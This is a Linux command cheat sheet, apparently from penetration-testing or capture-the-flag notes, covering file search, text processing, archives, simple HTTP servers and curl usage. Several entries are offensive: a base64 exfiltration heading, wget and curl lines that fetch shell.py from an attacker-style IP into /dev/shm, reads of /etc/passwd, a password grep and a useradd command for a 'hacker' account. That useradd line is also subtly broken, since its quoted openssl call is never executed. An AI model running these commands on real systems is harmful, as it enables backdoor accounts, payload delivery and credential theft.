Linux
PE Tool
Commands
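# Linux command cheat sheet: one command per line, meant to be copied
# individually, not executed as a script. Words in <angle brackets> and $vars
# are placeholders to fill in. Every flag uses a plain ASCII '-': the
# typographic dash that crept into the cut/awk/sort lines below is passed to
# the tool as a file name and the command fails.

#Exfiltration using Base64
base64 -w 0 file          # -w 0: emit one line, no wrapping (GNU base64)

#find a file
find -maxdepth 1          # current directory only (GNU find defaults to .)
find ./ -type f
find ./ -type d
find ./ -name 'abc*'      # quoted: unquoted abc* is expanded by the shell in cwd before find sees it
grep -lR password *.txt   # -l: print matching file names only
find ./ -name webmin 2>/dev/null   # drop permission-denied noise

#query file grep functions
cut -d ':' -f 1 /etc/passwd        # first field = user names
echo "hello::there::firend" | awk -F "::" '{print $1, $3}'
# first field of each line, counted, most frequent first. uniq -c needs sorted
# input; the final sort is -rn only: adding -u would collapse different hosts
# that happen to share the same count.
cut -d ' ' -f 1 access.log | sort | uniq -c | sort -rn

#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'     # -p: plain hex, then strip the line breaks

#Count
wc -l file   #Lines
wc -c file   #Chars (bytes; use -m for characters in multibyte locales)

#Sort
sort -nr file   #Sort by number and then reverse
sort -u file    #Sort and delete duplicates (same result as cat file | sort | uniq)

#Compare File
comm fileA.txt fileB.txt   # both inputs must be sorted; comm -12 keeps only common lines

#Download
wget 10.10.14.14:8000/shell.py
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
# -k (--insecure) disables curl's TLS certificate checks, so the download can be
# swapped in transit without any error; keep it for a self-signed host you
# control and prefer --cacert <ca.pem> otherwise.

#Unzipp
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z x file.7z      # 'x' (extract with paths) is the command; '-x' is 7z's exclude switch
sudo apt-get install xz-utils; unxz file.xz

#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker

#HTTP servers
python -m SimpleHTTPServer 80       # Python 2
python3 -m http.server              # Python 3, listens on 8000 unless a port is given
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S "$ip:80"                     # $ip = address to bind; quoted so the value is passed as one word

##Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

#Send Email
# to/from addresses are placeholders (the originals were stripped from the page);
# -s is the SMTP relay.
sendEmail -t to@example.com -f from@example.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content

#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob   # skip one block of bs=28 bytes, copy the rest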